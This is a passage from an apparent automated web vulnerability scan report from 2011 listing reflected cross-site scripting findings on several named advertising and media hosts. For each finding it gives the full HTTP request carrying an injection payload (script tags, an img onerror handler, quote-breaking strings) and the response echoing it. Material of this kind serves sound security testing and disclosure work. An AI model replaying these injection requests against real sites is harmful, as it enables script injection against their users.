User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:23 GMT
Date: Tue, 04 Oct 2011 20:15:23 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"349210<script>alert(1)</script>90075246625", c2:"7117341", c3:"5797640", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.24. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 5f83e<script>alert(1)</script>da15b6e6336 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=71173415f83e<script>alert(1)</script>da15b6e6336&c3=5797640&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:24 GMT
Date: Tue, 04 Oct 2011 20:15:24 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"71173415f83e<script>alert(1)</script>da15b6e6336", c3:"5797640", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.25. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 468d6<script>alert(1)</script>893df73b0c6 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640468d6<script>alert(1)</script>893df73b0c6&c4=44103179&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:24 GMT
Date: Tue, 04 Oct 2011 20:15:24 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640468d6<script>alert(1)</script>893df73b0c6", c4:"44103179", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.26. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 25e89<script>alert(1)</script>c6c67ced0d5 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=4410317925e89<script>alert(1)</script>c6c67ced0d5&c5=70503637&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:25 GMT
Date: Tue, 04 Oct 2011 20:15:25 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"4410317925e89<script>alert(1)</script>c6c67ced0d5", c5:"70503637", c6:"", c10:"", c15:"", c16:"", r:""});



1.27. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 59fe7<script>alert(1)</script>3259b533bda was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=44103179&c5=7050363759fe7<script>alert(1)</script>3259b533bda&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:25 GMT
Date: Tue, 04 Oct 2011 20:15:25 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"44103179", c5:"7050363759fe7<script>alert(1)</script>3259b533bda", c6:"", c10:"", c15:"", c16:"", r:""});



1.28. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload ee0c7<script>alert(1)</script>baa6f3b66f9 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=7117341&c3=5797640&c4=44103179&c5=70503637&c6=ee0c7<script>alert(1)</script>baa6f3b66f9 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://m.adnxs.com/tt?member=280&inv_code=SPTSHP&cb=1629178796
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633; UIDR=1317740365

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Tue, 18 Oct 2011 20:15:26 GMT
Date: Tue, 04 Oct 2011 20:15:26 GMT
Content-Length: 1257
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"3", c2:"7117341", c3:"5797640", c4:"44103179", c5:"70503637", c6:"ee0c7<script>alert(1)</script>baa6f3b66f9", c10:"", c15:"", c16:"", r:""});



1.29. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /services/messagebroker/amf

Issue detail

The value of the 3rd AMF string parameter is copied into the HTML document as plain text between tags. The payload 4fba7<script>alert(1)</script>30751131f5a was submitted in the 3rd AMF string parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /services/messagebroker/amf?playerKey=AQ~~,AAAAAAEDRq0~,qRcfDOX2mNu3MBQVberx3rCXi0MGsF8M HTTP/1.1
Host: c.brightcove.com
Proxy-Connection: keep-alive
Content-Length: 554
Origin: http://c.brightcove.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
content-type: application/x-amf
Accept: */*
Referer: http://c.brightcove.com/services/viewer/federated_f9?&width=472&height=310&flashID=1159880448001&bgcolor=%23FFFFFF&playerID=889778564001&playerKey=AQ~~%2CAAAAAAEDRq0~%2CqRcfDOX2mNu3MBQVberx3rCXi0MGsF8M&isVid=true&isUI=true&dynamicStreaming=true&autoStart=false&mute=false&%40videoPlayer=1159880448001&wmode=opaque&debuggerID=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

.......Fcom.brightcove.experience.ExperienceRuntimeFacade.getDataForExperience../1.....    ...Q8522cb0274262408ea8339a7e8ccbda9753644d9
cccom.brightcove.experience.ViewerExperienceRequest.experienceId.de
...[SNIP]...

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Content-Type: application/x-amf
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 22:20:02 GMT
Server:
Content-Length: 6440

......../1/onResult.......
.C[com.brightcove.templating.ViewerExperienceDTO#analyticsTrackers.publisherType.publisherId.playerKey.version#programmedContent!adTranslationSWF.id.hasProgramming+programmi
...[SNIP]...
p4j.....eAQ~~,AAAAAAEDRq0~,qRcfDOX2mNu3MBQVberx3rCXi0MGsF8M.    ..videoPlayer
sicom.brightcove.player.programming.ProgrammedMediaDTO.mediaId..playerId.componentRefId    type.mediaDTO
.Bp..1......ivideoPlayer4fba7<script>alert(1)</script>30751131f5a.........
.cOcom.brightcove.catalog.trimmed.VideoDTO.dateFiltered+FLVFullLengthStreamed/SWFVerificationRequired.endDate.FLVFullCodec.linkText.geoRestricted.previewLength.FLVPreviewSize.longDescription.
...[SNIP]...

1.30. http://cdn-cms.scout.com/feeds/analyticsfeed.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-cms.scout.com
Path:   /feeds/analyticsfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c5b5e<script>alert(1)</script>efaaefa4819 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feeds/analyticsfeed.ashx?page=http%3A//www.scout.com/&format=json&callback=$.analytics.reportc5b5e<script>alert(1)</script>efaaefa4819 HTTP/1.1
Host: cdn-cms.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.scout.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=T8kdbWQMqa2-XMYANwA; sample=38; __utma=202704078.1428052287.1317753697.1317753697.1317756177.2; __utmz=202704078.1317756177.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: Scoutweb11
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.0.0.0.30012
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 340
Date: Tue, 04 Oct 2011 20:14:24 GMT
Connection: close
Akamai: True

$.analytics.reportc5b5e<script>alert(1)</script>efaaefa4819({"network":"Scout","site":"www","sports":[],"categories":[],"pagetype":"FrontPage","pagesubtype":"","author":"","dateoverride":{"rfc822":"","year":"","month":"","day":"","hour":"","minute":"","second"
...[SNIP]...

1.31. http://cdn-forums.scout.com/adfeed.ashx [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-forums.scout.com
Path:   /adfeed.ashx

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f7c4b<img%20src%3da%20onerror%3dalert(1)>48071189668 was submitted in the callback parameter. This input was echoed as f7c4b<img src=a onerror=alert(1)>48071189668 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /adfeed.ashx?s=143&p=1&c=1&format=json&callback=$.showAd.cacheAdCodesf7c4b<img%20src%3da%20onerror%3dalert(1)>48071189668 HTTP/1.1
Host: cdn-forums.scout.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.scout.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=T8kdbWQMqa2-XMYANwA; sample=38; __utma=202704078.1428052287.1317753697.1317753697.1317756177.2; __utmz=202704078.1317756177.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; RefId=0; BrandId=0; SessionBrandId=0

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Server: MBRD25
X-AspNet-Version: 2.0.50727
X-Website-Assembly-Version: 2.21.0.0
Cache-Control: private
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Content-Length: 367
Date: Tue, 04 Oct 2011 20:14:28 GMT
Connection: close
Akamai: True

$.showAd.cacheAdCodesf7c4b<img src=a onerror=alert(1)>48071189668({"ads":[{"code":"SPTSN1","height":90,"type":"DISPLAY","width":728},{"code":"SPTSN3","height":600,"type":"DISPLAY","width":160},{"code":"SPTSHP","height":250,"type":"DISPLAY","width":300},{"code":"SPTS
...[SNIP]...

1.32. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1055c"-alert(1)-"1670b2a4751 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /contact/?1055c"-alert(1)-"1670b2a4751=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:06:33 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317765778922v-3n-12mc+1317765778922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 14757

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<link rel="stylesheet" href="http://co
...[SNIP]...
pt>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://corp.ign.com/contact/?1055c"-alert(1)-"1670b2a4751=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.33. http://corp.ign.com/contact/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://corp.ign.com
Path:   /contact/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 267cd"><script>alert(1)</script>ec564ca3669 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /contact/?267cd"><script>alert(1)</script>ec564ca3669=1 HTTP/1.1
Host: corp.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://xboxlive.ign.com/articles/119/1197949p1.html?5214a%22-alert(document.location)-%22db381a54140=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=173446715.1859606147.1317753406.1317756133.1317758813.3; __utmz=173446715.1317758813.3.3.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317765782922%7C1412373782922%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317767582922%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dstitial.ign.com%253Aburp%3B%20s_c13%3Dstitial.ign.com%253Aburp%3B%20s_sq%3D%3B; decc=US; NGUserID=a5d4238-2364-1857667316-7; i18n-cc=US; freq=c-1317765778922v-1n-12mc+1317765778922mv+1mn+12wwe~0; optimizelyBuckets=%7B%228445302%22%3A8453327%7D; rsi_segs=

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:06:29 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1317765778922v-3n-12mc+1317765778922mv+1mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 14786

<!DOCTYPE html>
<html lang="en"><head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Contact - IGN Entertainment</title>
<link rel="stylesheet" href="http://co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://corp.ign.com/contact/?267cd"><script>alert(1)</script>ec564ca3669=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.34. http://d7.zedo.com/jsc/d3/fl.js [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /jsc/d3/fl.js

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70eed'%3balert(1)//04d7e844b73 was submitted in the p parameter. This input was echoed as 70eed';alert(1)//04d7e844b73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/d3/fl.js?n=1302&c=174&r=21&d=31&w=298&h=70&p=7105cu70eed'%3balert(1)//04d7e844b73&z=0.2418893207795918 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/cj/V121A059CF4J-573I706K63342132177B6AK63720K63690QK63352QQP0G00G0Q0704DB43000058/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,5#0,24:0,6#0,24:0,6#0,24; PI=h484782Za669089Zc826000187,826000187Zs173Zt1260Zm68Zb43199; ZEDOIDX=29; FFAbh=977B809,20|40_1#391:305,20|149_1#365:162,20|636_1#381; FFBbh=1003B809,20|40_1#10:162,20|636_1#16:305,20|149_1#0; ZFFAbh=977B826,20|121_977#365; ZFFBbh=1006B826,20|121_977#0; ZCBC=1; FFgeo=5386156; FFcat=1302,69,9:1302,197,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "2202213-51ac-4a85262d8c280"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=781
Expires: Tue, 04 Oct 2011 20:23:50 GMT
Date: Tue, 04 Oct 2011 20:10:49 GMT
Content-Length: 2265
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzTitle='';

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;


               
...[SNIP]...
3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1317732010%3Bs=0%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=unknown%3Bp%3D6%3Bf%3D1249847%3Bh%3D1249740%3Bk=http://howlifeworks.com/shopping/penny_auction_solo/?AG_ID=991&cid=7105cu70eed';alert(1)//04d7e844b73">
...[SNIP]...

1.35. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/JV5bOqASsrxR

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c007e<script>alert(1)</script>3c5b4edbedc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sc007e<script>alert(1)</script>3c5b4edbedc/fox.com/JV5bOqASsrxR?mbr=true&feed=Homepage%20Player%20-%20Network%20HP%20Featured%20Clips&sig=004e8b68323a9f498627a39536c4a86065e90c96a27888e733466f784b6579&format=SMIL&Tracking=true&Embedded=true HTTP/1.1
Host: link.theplatform.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/_ui/fox_player/swf/flvPlayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 04 Oct 2011 20:19:16 GMT
Content-Type: text/html; charset=iso-8859-1
Cache-Control: must-revalidate,no-cache,no-store
Content-Length: 1428
Server: Jetty(6.1.19)

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 404 NOT_FOUND</title>
</head>
<body><h2>HTTP ERROR 404</h2>
<p>Problem accessing /sc007e<script>alert(1)</script>3c5b4edbedc/fox.com/JV5bOqASsrxR. Reason:
<pre>
...[SNIP]...

1.36. http://link.theplatform.com/s/fox.com/JV5bOqASsrxR [feed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.theplatform.com
Path:   /s/fox.com/JV5bOqASsrxR

Issue detail

The value of the feed request parameter is copied into the HTML document as plain text between tags. The payload db47d<script>alert(1)</script>0e109b9d114 was submitted in the feed parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

